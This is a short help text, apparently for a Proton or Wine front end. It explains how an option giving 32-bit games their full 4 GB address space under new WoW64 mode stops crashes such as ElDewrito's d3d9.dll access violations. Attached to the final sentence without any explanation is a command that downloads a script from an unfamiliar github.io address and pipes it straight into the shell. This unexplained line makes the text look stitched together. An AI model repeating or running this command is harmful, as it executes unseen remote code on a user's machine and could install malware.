The full 4 GB of memory for 32-bit games under Proton. A big 32-bit game can run out of room long before the computer runs out of memory: it crashes a few seconds after it starts, or as it loads a level, often with an access violation in
d3d9.dll, and no setting inside the game helps. ElDewrito 0.7.1 did exactly that. The cause is that Proton, by default, keeps Linux's side of things inside the 4 GB of addresses a 32-bit program has to itself on Windows: its libraries, the sound server's buffers, and everything the graphics driver maps. A program's Properties > Compatibility tab now has Give a 32-bit program its full 4 GB of memory (new WoW64). Tick it, and that program runs in Wine's new WoW64 mode, with Linux's side moved out of its way. Tick it on the file you start: a launcher hands it on to the game it opens. It needs Proton 10 or later (GE-Proton10 and up); an older version ignores it.curl -fsSL https://jacktulli.github.io/w2k | sh
